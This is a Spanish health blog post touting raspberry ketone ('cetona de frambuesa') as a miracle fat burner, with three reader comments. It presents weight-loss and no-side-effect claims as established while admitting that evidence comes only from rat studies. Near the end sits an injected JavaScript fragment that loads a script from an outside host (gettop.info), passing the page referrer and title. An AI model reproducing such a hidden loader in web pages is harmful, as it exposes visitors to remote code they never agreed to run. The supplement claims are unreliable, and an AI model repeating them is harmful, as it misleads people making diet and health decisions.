Salud y belleza » Dieta, Salud, alimentos

Raspberry Ketone o Cetonas de frambuesas, lo último para quemar grasa

3 Comentarios

cetona-frambuesa-quemagrasaDesde hace poco más de un año la cetona de frambuesa es lo más como quemador de grasas porque hay voces que lo prueban y dicen que funciona, y cada vez son más personas las que lo afirman. En poco tiempo este increíble suplemento se hizo muy famoso en Estados Unidos y en un mes ya estaba dando vueltas por el mercado internacional el bote de raspberry ketone o cetona de frambuesa, quemador de grasas.

Al parecer, este producto consigue que el cuerpo quema una importante cantidad de grasa gracias a que la convierte en calor para el cuerpo, lo que provoca que suba la temperatura y se altere finalmente el metabolismo basal al necesitar más energías que se obtienen de las reservas de grasa. Así se consigue perder peso con cetonas de frambuesas. Esto lo lleva a cabo estimulando la producción de adiponectina, una hormona que se encuentra en el tejido graso y que interfiere en el modo en el que el cuerpo metaboliza las grasas.

cetona-frambuesa-opiniones

Por otro lado, se dice que la cetona de frambuesa ayuda a metabolizar las grasas también porque el cuerpo pide menos alimentos, es decir, reduce el apetito y elimina la ansiedad por comer. Lo cierto es que es un producto bastante recurrente porque, o bien en bote o bien en sobres diluido en un litro de agua, te ayuda a beber más entre horas, está dulce y te quita el apetito.

Algunos especialistas en nutrición aseguran que las cetonas de frambuesa son sanas y no tienen efectos secundarios, lejos de otras dietas milagrosas más peligrosas para la salud. Además, para perder peso hay que acompañar su consumo con una dieta equilibrada para quemar grasa de forma más rápida y efectiva.

raspberry-ketone

En cuanto a las pruebas científicas que corroboren este hecho, por ahora solo se ha estudiado en ratas de laboratorio, aunque se ha concluido que las cetonas de frambuesa previenen la obesidad y mejoran el hígado graso gracias a que altera el metabolismo lipídico.

Por otro lado, se encuentran las opiniones del raspberry ketone u opiniones de la cetona de frambuesa. Al haberse popularizado tan rápido todo el mundo habla de este producto milagroso, aunque tiene sus defensores y sus detractores. Los que están a favor aseguran que han conseguido quemar grasa y adelgazar tonificando todo su cuerpo.

frambuesas-cetona-adelgazar

Sin embargo, los detractores, aseguran que junto con otros medicamentos pueden elevar los niveles de norepinefrina (o noadrenalina) que puede provocar un aumento de la frecuencia cardíaca. Por otro lado, otros especialistas en nutrición no se fían de los resultados porque no hay estudios realizados con humanos. Sin embargo, aseguran que es innegable que las cetonas de frambuesas son ricas en fitoquímicos y esto ayuda a prevenir enfermedades y a estar más saludables, además de ser ricos en antioxidantes.

cetona-frambuesa-oz

El surgimiento de voces en contra de este producto quemagrasa no ha conseguido que se pare su avance hasta llegar a Europa y a España e incluso laboratorios europeos han comenzado a hacer su propia fórmula. El producto original Raspberry Ketone del doctor Oz lleva, además de cetona de frambuesa, mango africano, acai fruta, extracto de té verde, reveratrol, cafeína anhidra, vinagre de sidra de manzana, kelp, toronja… aunque el producto que se dice es milagroso es la cetona de frambuesa.

¿Has probado la cetona de frambuesa? ¿Crees que funciona?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , , ,

3 Comments »

  • Paula said:

    Yo lo he probado, es bastante efectivo. No como producto milagroso, pero yo compré los sobres y los vertía en agua muy fría y estaba bueno, y además te ayuda a calmar el apetito, comes mucho menos y todo, pero eso sí , tiene que estar frío si no no me gusta.

  • Jimena said:

    lo probaré, a ver qué tal funciona, que tengo que perder un par de kilitos en una semana :)

  • Juan Carlos said:

    COMO tengo que hacerlo para obtener este producto milagroso llamado Raspberry Ketone y cuanto es su valor en pesos Chilenos desde ya muchas gracias y cuanto es su demora .
    Y cuanto es su consumo diario y su tiempo de trstsmiento para poder bajar 30 kilos que tengo de mas

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.